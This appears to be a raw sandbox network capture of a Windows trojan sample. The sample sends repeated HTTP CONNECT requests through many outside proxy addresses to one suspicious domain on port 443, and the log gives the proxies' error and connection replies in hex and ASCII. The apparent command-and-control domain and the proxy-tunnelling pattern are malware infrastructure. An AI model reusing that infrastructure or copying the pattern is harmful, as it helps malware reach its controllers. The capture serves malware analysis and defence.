                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1541192.168.2.85448247.100.207.11780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.231200933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.603919983 CET590INHTTP/1.1 400
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Language: en
                                                                                Content-Length: 435
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1542192.168.2.850358193.34.237.24110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.256138086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1543192.168.2.850338186.215.87.19460025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.262376070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382538080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.492208958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1544192.168.2.85449047.74.226.850015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.272979975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1545192.168.2.854374117.160.250.13388995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.313319921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.525212049 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                Feb 23, 2024 14:28:43.162118912 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1546192.168.2.854516184.185.2.1241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.366960049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1547192.168.2.8543485.56.124.17667345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.384970903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.713454008 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1548192.168.2.85450120.219.180.10531295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.384972095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.720963955 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1549192.168.2.854517187.19.127.25341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.413769960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1550192.168.2.85453868.169.59.17183805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.424130917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.604922056 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1551192.168.2.854561104.16.107.142805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.424277067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.511902094 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1552192.168.2.854575104.20.56.71805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.433100939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.521069050 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1553192.168.2.854580104.16.241.204805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.434649944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.523394108 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1554192.168.2.854590104.25.108.120805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.445401907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.532846928 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1555192.168.2.85460845.12.31.3805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.449719906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.537193060 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1556192.168.2.85462623.227.38.198805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.465204000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.553020000 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1557192.168.2.854637162.159.247.57805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.471975088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.559884071 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1558192.168.2.85437391.189.177.18831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.474730015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.491908073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.678781033 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/5.7
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:41 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3532
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                X-Cache: MISS from lb1
                                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                                Via: 1.1 lb1 (squid/5.7)
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1559192.168.2.854536104.200.135.4641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.482037067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1560192.168.2.854657104.16.25.216805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.483613968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
